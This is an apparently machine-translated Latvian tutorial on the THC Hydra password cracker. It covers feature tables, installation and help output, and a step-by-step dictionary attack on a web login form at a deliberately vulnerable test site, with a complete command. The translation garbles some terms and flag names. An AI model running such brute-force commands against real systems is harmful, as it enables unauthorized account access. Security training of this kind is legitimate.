Parole ir tehniski definēta kā slepena rakstzīmju virkne, ko izmanto, lai autentificētu resursus vai piekļūtu tiem. Tas ir jātur slepenībā un jāslēpj no citiem, kuriem nav atļauts piekļūt šiem resursiem. Paroles ir izmantotas datoros kopš pirmajām skaitļošanas dienām. Viena no pirmajām koplietošanas sistēmām tika ieviesta 1961. gadā. Tam bija pieteikšanās komanda, kas pieprasīja lietotāja paroli. Pēc PASSWORD ievadīšanas sistēma, ja iespējams, izslēdz drukāšanas mehānismu, lai lietotājs varētu privāti ievadīt savu paroli.
Paroles stiprums ir atkarīgs no garuma, sarežģītības un neparedzamības. Tas mēra efektivitāti pretoties minējumiem vai to laušanai. No otras puses, vājās paroles saīsina laiku, kas vajadzīgs, lai uzminētu un piekļūtu personīgajiem/korporatīvajiem e-pastiem, sensitīviem datiem, piemēram, finanšu informācijai, uzņēmuma informācijai, kredītkartēm utt.
Ir daudz veidu, kā parole var būt vāja, kas atbilst dažādu uzbrukumu shēmu priekšrocībām. Vispopulārākais šāda veida akreditācijas uzbrukums ir brutāls spēks. tā ir izmēģinājumu un kļūdu metode, piemēram, minēšana, mēģinājums atšifrēt šifrētus datus, piemēram, paroli vai datu šifrēšanu, ko izmanto lietojumprogramma vai hakeru rīks.
Hydra ir ātrākais tīkla pieteikšanās krekeris, kas atbalsta daudzus uzbrukuma protokolus. Tas ir ļoti ātrs un elastīgs, un jaunus moduļus ir viegli pievienot. Šis rīks ļauj pētniekiem un drošības konsultantiem parādīt, cik viegli būtu attālināti iegūt neatļautu piekļuvi sistēmai. Hidru uzrakstīja van Hauzers, un to papildus atbalstīja Deivids Maciejaks. Jaunākajā atjauninājumā hidra izstrāde tiek pārvietota uz publisko github krātuvi vietnē https://github.com/vanhauser-thc/thc-hydra.
Tika pārbaudīta, lai Hydra varētu apkopot operētājsistēmās Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, un tā ir pieejama saskaņā ar GPLv3 ar īpašu OpenSSL licences paplašinājumu.
THC Hydra atbalsta šādus protokolus: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD , HTTP starpniekserveris, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 un v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC un XMPP.
HYDRA SALĪDZINĀŠANA AR CITIEM PĀRKĀPŠANAS RĪKIEM
Blakus hidrai ir arī daudz pieteikšanās krekinga rīku, taču neviens no tiem neatbalsta milzīgu protokolu sarakstu un paralēlo pieteikšanās krekinga atbalstu, piemēram, hidra. Tālāk esošās tabulas parāda funkciju, pakalpojumu un ātruma salīdzinājuma rezultātus, salīdzinot ar medusa un ncrack.
Iespējas
| Iezīme | Hidra | medūzas | Ncrack |
| Licence | AGPLv3 | GPLv2 | GPLv2 + Nmap noteikumi |
| IPv6 atbalsts | Jā | Nē | Nē |
| Grafiskais lietotāja interfeiss | Jā | Jā | Nē |
| Starptautisks atbalsts (RFC 4013) | Jā | Nē | Nē |
| HTTP starpniekservera atbalsts | Jā | Jā | Nē |
| SOCKS starpniekservera atbalsts | Jā | Nē | Nē |
| Atbalstītie protokoli | 51 | 22 | 7 |
Pakalpojumi
| apkalpošana | Sīkāka informācija | Hidra | medūzas | Ncrack |
| ADAM-6500 | Jā | Nē | Nē | |
| AFP | Jā | Jā | Nē | |
| Zvaigznīte | Jā | Nē | Nē | |
| Cisco parole | Jā | Nē | Nē | |
| Cisco iespējot | Jā | Nē | Nē | |
| CVS | Jā | Jā | Nē | |
| Ugunsputns | Jā | Nē | Nē | |
| FTP | Jā | Jā | Jā | |
| SSL atbalsts | AUTH TLS un FTP, izmantojot SSL | AUTH TLS un FTP, izmantojot SSL | Nē | |
| HTTP | Metodes) | GET, HEAD, POST | GŪT | GŪT |
| Pamata autentifikācija | Jā | Jā | Jā | |
| HTTP veidlapa | Metodes) | GET, POST | GET, POST | Nē |
| SSL atbalsts | HTTPS | HTTPS | Nē | |
| HTTP starpniekserveris | Pamata autentifikācija | Jā | Nē | Nē |
| DIGEST-MD5 Aut | Jā | Nē | Nē | |
| NTLM aut | Jā | Nē | Nē | |
| SSL atbalsts | HTTPS | Nē | Nē | |
| HTTP PROXY URL uzskaitījums | Jā | Nē | Nē | |
| ICQ | v5 | Jā 1 | Nē | Nē |
| IMAP | LOGIN atbalsts | Jā | Jā | Nē |
| AUTH LOGIN atbalsts | Jā | Nē | Nē | |
| AUTH PLAIN atbalsts | Jā | Jā | Nē | |
| AUTH CRAM-MD5 atbalsts | Jā | Nē | Nē | |
| AUTH CRAM-SHA1 atbalsts | Jā | Nē | Nē | |
| AUTH CRAM-SHA256 atbalsts | Jā | Nē | Nē | |
| AUTH DIGEST-MD5 atbalsts | Jā | Nē | Nē | |
| AUTH NTLM atbalsts | Jā | Jā | Nē | |
| AUTH SCRAM-SHA1 atbalsts | Jā | Nē | Nē | |
| SSL atbalsts | IMAPS & STARTTLS | IMAPS & STARTTLS | Nē | |
| IRC | Vispārējā servera parole | Jā | Nē | Nē |
| OPER režīma parole | Jā | Nē | Nē | |
| LDAP | v2, vienkāršs atbalsts | Jā | Nē | Nē |
| v3, vienkāršs atbalsts | Jā | Nē | Nē | |
| v3, AUTH CRAM-MD5 atbalsts | Jā | Nē | Nē | |
| AUTH DIGEST-MD5 atbalsts | Jā | |||
| AUTH NTLM atbalsts | Jā | Jā | ||
| AUTH SCRAM-SHA1 atbalsts | Jā | |||
| SSL atbalsts | IMAPS & STARTTLS | IMAPS & STARTTLS | ||
| IRC | Vispārējā servera parole | Jā | ||
| OPER režīma parole | Jā | |||
| LDAP | v2, vienkāršs atbalsts | Jā | ||
| v3, vienkāršs atbalsts | Jā | |||
| v3, AUTH CRAM-MD5 atbalsts | Jā | |||
| v3, AUTH DIGEST-MD5 atbalsts | Jā | |||
| MS-SQL | Jā | Jā | ||
| MySQL | v3.x | Jā | Jā | |
| v4.x | Jā | Jā | ||
| v5.x | Jā | Jā | ||
| NCP | Jā | Jā | ||
| NNTP | USER atbalsts | Jā | Jā | |
| AUTH LOGIN atbalsts | Jā | |||
| AUTH PLAIN atbalsts | Jā | |||
| AUTH CRAM-MD5 atbalsts | Jā | |||
| AUTH DIGEST-MD5 atbalsts | Jā | |||
| AUTH NTLM atbalsts | Jā | |||
| SSL atbalsts | STARTTLS un NNTP, izmantojot SSL | |||
| Oracle | Datu bāze | Jā | Jā | |
| TNS klausītājs | Jā | |||
| SID uzskaitījums | Jā | |||
| PC-NFS | Jā | |||
| pcAnywhere | Vietējā autentifikācija | Jā | Jā | |
| Autentifikācija uz OS (MS) | Jā | |||
| POP3 | USER atbalsts | Jā | Jā | Jā |
| APOP atbalsts | Jā | |||
| AUTH LOGIN atbalsts | Jā | Jā | ||
| AUTH PLAIN atbalsts | Jā | Jā | ||
| AUTH CRAM-MD5 atbalsts | Jā | |||
| AUTH CRAM-SHA1 atbalsts | Jā | |||
| AUTH CRAM-SHA256 atbalsts | Jā | |||
| AUTH DIGEST-MD5 atbalsts | Jā | |||
| AUTH NTLM atbalsts | Jā | Jā | ||
| SSL atbalsts | POP3S un STARTTLS | POP3S un STARTTLS | POP3S | |
| PostgreSQL | Jā | Jā | ||
| Zvaigznīte | Jā | |||
| LAP | Windows darbstacija | Jā | Jā | Jā |
| Windows Server | Jā | Jā | ||
| Domēna autentifikācija | Jā | Jā | ||
| REDIS | Jā | Nē | ||
| REXEC | Jā | Jā | ||
| RLOGIN | Jā | Jā | ||
| RPCAP | Jā | Nē | ||
| RSH | Jā | Jā | ||
| RTSP | Jā | Nē | ||
| SAP R / 3 | Jā | |||
| Siemens S7-300 | Jā | |||
| SIP | Jā | |||
| SSL atbalsts | SIP, izmantojot SSL | |||
| SMB | NetBIOS režīms | Jā | Jā | Nē |
| W2K vietējais režīms | Jā | Jā | Jā | |
| Hash režīms | Jā | Jā | Nē | |
| Notīrīt tekstu Aut | Jā | Jā | ||
| LMv1 Aut | Jā | Jā | Jā | |
| LMv2 Aut | Jā | Jā | Jā | |
| NTLMv1 Aut | Jā | Jā | Jā | |
| NTLMv2 Aut | Jā | Jā | Jā | |
| SMTP | AUTH LOGIN atbalsts | Jā | Jā | |
| AUTH PLAIN atbalsts | Jā | Jā | ||
| AUTH CRAM-MD5 atbalsts | Jā | |||
| AUTH DIGEST-MD5 atbalsts | Jā | |||
| AUTH NTLM atbalsts | Jā | Jā | ||
| SSL atbalsts | SMTPS un STARTTLS | SMTPS un STARTTLS | ||
| SMTP lietotājs Enum | VRFY cmd | Jā | Jā | |
| EXPN cmd | Jā | Jā | ||
| RCPT TO cmd | Jā | Jā | ||
| SNMP | v1 | Jā | Jā | |
| v2c | Jā | Jā | ||
| v3 | (Tikai MD5/SHA1 autentifikācija) | |||
| ZEĶES | v5, paroles aut | Jā | ||
| SSH | v1 | Jā | ||
| v2 | Jā | Jā | Jā | |
| SSH atslēgas | v1, v2 | Jā | ||
| Subversija (SVN) | Jā | Jā | ||
| Komandas runa | TS2 | Jā | ||
| Telnet | Jā | Jā | Jā | |
| XMPP | AUTH LOGIN atbalsts | Jā | ||
| AUTH PLAIN atbalsts | Jā | |||
| AUTH CRAM-MD5 atbalsts | Jā | |||
| AUTH DIGEST-MD5 atbalsts | Jā | |||
| AUTH SCRAM-SHA1 atbalsts | Jā | |||
| VMware autentifikācijas dēmons | v1.00 / v1.10 | Jā | Jā | |
| SSL atbalsts | Jā | Jā | ||
| VNC | RFB 3.x paroles atbalsts | Jā | Jā | |
| RFB 3.x lietotāja+paroles atbalsts | (Tikai UltraVNC) | |||
| RFB 4.x paroles atbalsts | Jā | Jā | ||
| RFB 4.x lietotāja+paroles atbalsts | (Tikai UltraVNC) |
Ātruma salīdzinājums
| Ātrums (s) | Hidra | medūzas | Ncrack |
| 1 Uzdevums / FTP modulis | 11.93 | 12.97 | 18.01 |
| 4 Uzdevumi / FTP modulis | 4.20 | 5.24 | 9.01 |
| 16 Uzdevumi / FTP modulis | 2.44 | 2.71 | 12.01 |
| 1 Task / SSH v2 modulis | 32.56 | 33,84 | 45.02 |
| 4 Uzdevumi / SSH v2 modulis | 10.95 | Salauzts | Garām |
| 16 Uzdevumi / SSH v2 modulis | 5.14 | Salauzts | Garām |
Tas bija īss vienkāršs ievads hidrai. Tagad pāriesim pie instalēšanas.
HYDRA UZSTĀDĪŠANA
Hydra ir iepriekš instalēta kali linux, taču, ja jums ir cita operētājsistēma, varat to apkopot un instalēt savā sistēmā. Pašlaik hidras atbalsts dažādās platformās:
- Visas UNIX platformas (Linux, *bsd, Solaris utt.)
- MacOS (būtībā BSD klons)
- Windows ar Cygwin (gan IPv4, gan IPv6)
- Mobilās sistēmas, kuru pamatā ir Linux, MacOS vai QNX (piemēram, Android, iPhone, Blackberry 10, Zaurus, iPaq)
Lai lejupielādētu, konfigurētu, apkopotu un instalētu hidru, vienkārši ierakstiet terminālī:
git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install
Ja jums ir Ubuntu/Debian, jums būs nepieciešamas dažas atkarības bibliotēkas:
apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev
Ja šīs bibliotēkas nevarējāt atrast savā krātuvē, tās ir jālejupielādē un jāinstalē manuāli.
KĀ LIETOT HYDRA
Apsveicam, tagad jums ir izdevies instalēt hidru savā sistēmā. Patiesībā Hydra nāk ar divām garšām-GUI-gtk un manu iecienītāko CLI versiju. turklāt hidrai ir arī CLI vadīta versija, ko sauc par hidra-vedni. Jūs tiksit vadīts soli pa solim, tā vietā, lai terminālī manuāli ierakstītu visas komandas vai argumentus. Lai palaistu hidra, no sava termināļa veida:
CLI:
hydra
CLI vednim:
hydra-wizard
GUI:
xhydra
Kad esat ierakstījis “hydra”, tas parādīs šādas palīdzības komandas:
[email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh
Bruteforce tīmekļa pieteikšanās ar hidru
Hydra atbalsta dažus bruteforcing pakalpojumus, kā es minēju iepriekš, viens no tiem tiek izmantots, lai veiktu tīmekļa pieteikšanos, piemēram, pieteikšanos sociālajos medijos, lietotāja bankas pieteikšanās veidlapu, maršrutētāja tīmekļa pieteikšanos utt. kas izskatīs šo pieprasījumu. Šajā apmācībā es jums parādīšu, kā nodrošināt neaizsargātu tīmekļa pieteikšanos. Pirms hidras iedarbināšanas mums jāzina daži nepieciešamie argumenti, piemēram:
- Mērķis : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
- Pieteikšanās lietotājvārds : admin (ja neesat pārliecināts, piespiediet to)
- Paroļu saraksts : Vārdnīcas failu saraksta, kurā ir iespējamās paroles, atrašanās vieta.
- Veidlapas parametri : vispārīgi, izmantojiet viltojuma datus vai starpniekserveri, lai iegūtu pieprasījuma parametru formu. Bet šeit es izmantoju Iceweasel, uz Firefox balstītu tīkla izstrādātāja rīkjoslu.
- Servisa modulis : http-post-veidlapa
Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.
Ziņu parametru iegūšana, izmantojot pārlūkprogrammu, iceweasel/firefox
Firefox pārlūkprogrammā nospiediet taustiņus ' CTRL + SHIFT + Q ‘. Pēc tam atveriet tīmekļa pieteikšanās lapuhttp://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F, jūs pamanīsit, ka tīkla izstrādātāja cilnē parādās teksts. Tas norāda, kādi faili mums tiek nodoti. Skatiet visu metodi GET, jo mēs vēl neesam ievietojuši datus.
Lai iegūtu pēcformas parametrus, ievadiet lietotājvārda un paroles veidlapā visu, ko vēlaties. Tīkla izstrādātāja cilnē jūs pamanīsit jaunu POST metodi. Veiciet dubultklikšķi uz šīs līnijas, cilnē Galvenes labajā pusē noklikšķiniet uz pogas Rediģēt un atkārtoti nosūtīt. Pieprasījuma pamattekstā nokopējiet pēdējo rindu, piemēram, tfUName = asu & tfUPass = raimu . un tfUName un tfUPass mums vajadzīgie parametri. Kā redzams zemāk:
Kali linux ir daudz vārdu sarakstu, izvēlieties atbilstošo vārdu sarakstu vai vienkārši izmantojiet vietu rockyou.txt /usr/share/wordlists/ kā redzams zemāk:
Labi, tagad mēs esam ieguvuši visus nepieciešamos argumentus un esam gatavi aktivizēt hidru. Šeit ir komandu paraugs:
hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f
Sadalīsim komandas:
- un : ir vārds, kas satur lietotājvārda kontu, izmantojiet -L, lai failā apskatītu iespējamo lietotājvārdu sarakstu.
- Lpp : ir iespējamo paroļu failu saraksts, izmantojiet -p, lai burtiski lietotu viena vārda paroli, nevis uzminētu.
- testapp.vunlwebapp.com : ir saimniekdatora nosaukums vai mērķis
- http-pasta veidlapa : ir mūsu izmantotais servisa modulis
- /Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = nepieciešami 3 parametri, sintakse ir šāda:
{lapas URL}: {Pieprasīt ziņas pamatteksta parametrus}: S = {Atrodiet visu, kas lapā pēc veiksmīgas pierakstīšanās} - v = Daudzveidīgs režīms
- V = rādīt pieteikšanos: iziet katru mēģinājumu
- f = Pārtraukt programmu, ja pāra pieteikšanās: parole ir atrasta
Ļaujiet hidrai mēģināt salauzt mūsu paroli, tai ir vajadzīgs laiks, jo tas ir uzbrukums vārdnīcai. Kad jums izdevās atrast pieteikšanās pāri: parole hydra nekavējoties pārtrauks darbu un parādīs derīgus akreditācijas datus.
Ir tik daudz, ko hidra varētu darīt, jo šajā apmācībā mēs tikko iemācījāmies piespiest tīmekļa pieteikšanos, izmantojot hidru, mēs mācāmies tikai vienu protokolu, proti, http-post-form protokolu. Mēs varam izmantot hidru arī pret citu protokolu, piemēram, ssh, ftp, telnet, VNC, starpniekserveris utt.